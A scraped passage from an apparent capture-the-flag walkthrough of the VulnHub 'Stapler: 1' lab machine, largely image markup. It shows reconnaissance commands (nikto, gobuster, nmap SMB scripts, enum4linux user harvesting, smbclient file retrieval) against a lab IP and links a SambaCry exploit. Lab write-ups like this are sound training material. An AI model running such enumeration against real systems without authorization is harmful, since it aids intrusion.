srcset=\"https:\/\/miro.medium.com\/max\/414\/1*wNJn91ILexpAhyRNTyrxgA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*wNJn91ILexpAhyRNTyrxgA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*wNJn91ILexpAhyRNTyrxgA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*wNJn91ILexpAhyRNTyrxgA.png 700w\" width=\"1185\" height=\"98\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe24\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe24\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<ul class=\"\">\n<li id=\"e802\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)<\/li>\n<\/ul>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"32b9\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">ssh 10.0.2.31<\/span><\/pre>\n<p id=\"7f45\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">There\u2019s a banner.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ago\">\n<div class=\"kc s ao kd\">\n<div class=\"agp kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*PH7i7z89xFMQb90UKZFwZA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"749\" height=\"149\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe25\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe25\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1124\/1*PH7i7z89xFMQb90UKZFwZA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*PH7i7z89xFMQb90UKZFwZA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*PH7i7z89xFMQb90UKZFwZA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*PH7i7z89xFMQb90UKZFwZA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*PH7i7z89xFMQb90UKZFwZA.png 700w\" width=\"749\" height=\"149\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe26\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe26\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<ul class=\"\">\n<li id=\"740a\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 53 dnsmasq 2.75<\/li>\n<\/ul>\n<p id=\"7482\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Reverse lookup<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"f2e9\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">dig -x 10.0.2.31 <a class=\"ds li\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/twitter.com\/10\" rel=\"noopener nofollow\" rel=\"nofollow\" >@10<\/a>.0.2.31<\/span><\/pre>\n<p id=\"3a44\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Nothing<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev agq\">\n<div class=\"kc s ao kd\">\n<div class=\"agr kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*HyXdWA0RKbKl6St474WslQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"797\" height=\"415\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe27\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe27\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1196\/1*HyXdWA0RKbKl6St474WslQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*HyXdWA0RKbKl6St474WslQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*HyXdWA0RKbKl6St474WslQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*HyXdWA0RKbKl6St474WslQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*HyXdWA0RKbKl6St474WslQ.png 700w\" width=\"797\" height=\"415\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe28\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe28\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<ul class=\"\">\n<li id=\"9964\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 80 PHP cli server 5.5 or later<\/li>\n<\/ul>\n<p id=\"09f2\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Nikto<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"209e\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nikto -h http:\/\/10.0.2.31<\/span><\/pre>\n<p id=\"2d29\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">There\u2019re \u2018.bashrc\u2019 and \u2018.profile\u2019.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ags\">\n<div class=\"kc s ao kd\">\n<div class=\"agt kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*TbKK403zmkfgDDZhbyGyCA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1716\" height=\"465\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe29\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe29\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2574\/1*TbKK403zmkfgDDZhbyGyCA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*TbKK403zmkfgDDZhbyGyCA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*TbKK403zmkfgDDZhbyGyCA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*TbKK403zmkfgDDZhbyGyCA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*TbKK403zmkfgDDZhbyGyCA.png 700w\" width=\"1716\" height=\"465\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe30\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe30\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev agu\">\n<div class=\"kc s ao kd\">\n<div class=\"agv kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*ftxUSPfAbCNrM9XSWBtlEw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"584\" height=\"289\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe31\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe31\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/876\/1*ftxUSPfAbCNrM9XSWBtlEw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 584px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*ftxUSPfAbCNrM9XSWBtlEw.png 276w, https:\/\/miro.medium.com\/max\/828\/1*ftxUSPfAbCNrM9XSWBtlEw.png 552w, https:\/\/miro.medium.com\/max\/876\/1*ftxUSPfAbCNrM9XSWBtlEw.png 584w\" width=\"584\" height=\"289\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe32\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe32\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"9f46\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Download \u2018.bashrc\u2019 and \u2018.profile\u2019. and read them<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"6926\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">wget <a class=\"ds li\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/10.0.2.31\/.bashrc\" rel=\"noopener nofollow\" rel=\"nofollow\" >http:\/\/10.0.2.31\/.bashrc<\/a><\/span><span id=\"8d52\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">wget http:\/\/10.0.2.31\/.profile<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev agw\">\n<div class=\"kc s ao kd\">\n<div class=\"agx kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*2stBuFyWeN4p4TSXeQabSg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1812\" height=\"495\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe33\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe33\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2718\/1*2stBuFyWeN4p4TSXeQabSg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*2stBuFyWeN4p4TSXeQabSg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*2stBuFyWeN4p4TSXeQabSg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*2stBuFyWeN4p4TSXeQabSg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*2stBuFyWeN4p4TSXeQabSg.png 700w\" width=\"1812\" height=\"495\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe34\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe34\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"7d75\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cat .bashrc<\/span><\/pre>\n<p id=\"348c\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Nothing<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev agy\">\n<div class=\"kc s ao kd\">\n<div class=\"agz kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*96sGwzfJmbMcR6QdW9RxBw.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"834\" height=\"651\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe35\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe35\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1251\/1*96sGwzfJmbMcR6QdW9RxBw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*96sGwzfJmbMcR6QdW9RxBw.png 276w, https:\/\/miro.medium.com\/max\/828\/1*96sGwzfJmbMcR6QdW9RxBw.png 552w, https:\/\/miro.medium.com\/max\/960\/1*96sGwzfJmbMcR6QdW9RxBw.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*96sGwzfJmbMcR6QdW9RxBw.png 700w\" width=\"834\" height=\"651\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe36\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe36\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"75f0\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cat .profile<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev aha\">\n<div class=\"kc s ao kd\">\n<div class=\"ahb kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*Xli-8QXmCeRiDzlcj2nxLg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"832\" height=\"538\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe37\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe37\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1248\/1*Xli-8QXmCeRiDzlcj2nxLg.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*Xli-8QXmCeRiDzlcj2nxLg.png 276w, https:\/\/miro.medium.com\/max\/828\/1*Xli-8QXmCeRiDzlcj2nxLg.png 552w, https:\/\/miro.medium.com\/max\/960\/1*Xli-8QXmCeRiDzlcj2nxLg.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*Xli-8QXmCeRiDzlcj2nxLg.png 700w\" width=\"832\" height=\"538\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe38\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe38\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"0635\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Further directory enumeration<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"1494\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">gobuster dir --wordlist \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt -u <a class=\"ds li\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/10.0.2.31\/\" rel=\"noopener nofollow\" rel=\"nofollow\" >http:\/\/10.0.2.31\/<\/a> -x php,txt,html,sh,cgi -q<\/span><\/pre>\n<p id=\"53af\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Nothing<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ahc\">\n<div class=\"kc s ao kd\">\n<div class=\"ahd kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*SpRzLu2Qagagt_E1lyv-0w.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1868\" height=\"103\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe39\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe39\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2802\/1*SpRzLu2Qagagt_E1lyv-0w.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*SpRzLu2Qagagt_E1lyv-0w.png 276w, https:\/\/miro.medium.com\/max\/828\/1*SpRzLu2Qagagt_E1lyv-0w.png 552w, https:\/\/miro.medium.com\/max\/960\/1*SpRzLu2Qagagt_E1lyv-0w.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*SpRzLu2Qagagt_E1lyv-0w.png 700w\" width=\"1868\" height=\"103\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe40\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe40\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<ul class=\"\">\n<li id=\"23bb\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja ld jc jd gj\" data-selectable-paragraph=\"\">port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)<\/li>\n<\/ul>\n<p id=\"e149\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I googled the existing exploit and there\u2019s a sambacry, but I need to have a credential. I\u2019ll leave this for a while.<\/p>\n<div class=\"hc hd he hf hg hh\">\n<div class=\"hi n ab\">\n<div class=\"hj n ak p hk hl\">\n<h2 class=\"ba cz dn bc hm hn ho hp hq hr hs dk gj\">opsxcq\/exploit-CVE-2017-7494<\/h2>\n<div class=\"ht s\">\n<h3 class=\"ba b dn bc hm hn ho hp hq hr hs by\">Samba is a free software re-implementation of the SMB\/CIFS networking protocol. Samba provides file and print services\u2026<\/h3>\n<\/div>\n<div class=\"hu s\">\n<p class=\"ba b hv bc hm hn ho hp hq hr hs by\">github.com<\/p>\n<\/div>\n<\/div>\n<div class=\"hw s\">\n<div class=\"ahe s hy hz ia hw ib ic hh\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<p id=\"cd9d\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Enumeration<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"0663\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.31<\/span><\/pre>\n<p id=\"b1eb\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I\u00a0<span id=\"rmm\">c<\/span>an access \\kathy and \\tmp.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev ahf\">\n<div class=\"kc s ao kd\">\n<div class=\"ahg kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/36\/1*ZUIFigJlMQDmN6AWvvRkPQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"651\" height=\"806\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe41\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe41\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/977\/1*ZUIFigJlMQDmN6AWvvRkPQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 651px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*ZUIFigJlMQDmN6AWvvRkPQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*ZUIFigJlMQDmN6AWvvRkPQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*ZUIFigJlMQDmN6AWvvRkPQ.png 640w, https:\/\/miro.medium.com\/max\/977\/1*ZUIFigJlMQDmN6AWvvRkPQ.png 651w\" width=\"651\" height=\"806\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe42\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe42\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"5de6\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">enum4linux -a 10.0.2.31 &gt; enum4linux.txt<\/span><\/pre>\n<p id=\"72bd\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Read the file, I got usernames.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev ahh\">\n<div class=\"kc s ao kd\">\n<div class=\"ahi kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/38\/1*DAhkYBXBMs1KZD--BQ2Mig.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"405\" height=\"494\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe43\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe43\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/608\/1*DAhkYBXBMs1KZD--BQ2Mig.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 405px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*DAhkYBXBMs1KZD--BQ2Mig.png 276w, https:\/\/miro.medium.com\/max\/608\/1*DAhkYBXBMs1KZD--BQ2Mig.png 405w\" width=\"405\" height=\"494\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe44\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe44\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"4703\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Save them as users.txt<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"eu ev ahj\">\n<div class=\"kc s ao kd\">\n<div class=\"ahk kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/36\/1*GeXJhRbCO0J5fATL42HHdA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"446\" height=\"559\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe45\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe45\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"446\" height=\"559\" \/><\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"7005\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Connect accessible directory, \/kathy<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"e0e9\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">smbclient \/\/10.0.2.31\/kathy<\/span><span id=\"33b0\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">dir<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ahl\">\n<div class=\"kc s ao kd\">\n<div class=\"ahm kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*n_vIM40jclmi-W-p3YA5hg.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"831\" height=\"318\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe46\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe46\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"831\" height=\"318\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"628a\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cd kathy_stuff<\/span><span id=\"1f52\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">dir<\/span><span id=\"ac15\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">get to_do-list.txt<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ahn\">\n<div class=\"kc s ao kd\">\n<div class=\"aho kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*V0APUgWkpLvjqilAJo4Zew.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"837\" height=\"199\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe47\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe47\" \/><\/div>\n<p><img class=\"ej jy fd em ei jz w c\" role=\"presentation\" alt=\"\" width=\"837\" height=\"199\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"d444\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">cd ..\/backup<\/span><span id=\"64bc\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">get vsftpd.conf<\/span><span id=\"1abb\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">get wordpress-4.tar.gz<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ahp\">\n<div class=\"kc s ao kd\">\n<div class=\"ahq kf s\">\n<div class=\"pn wz fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh ki\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*x9ArzO3eMXnqKrpH8OI-DA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"897\" height=\"338\" 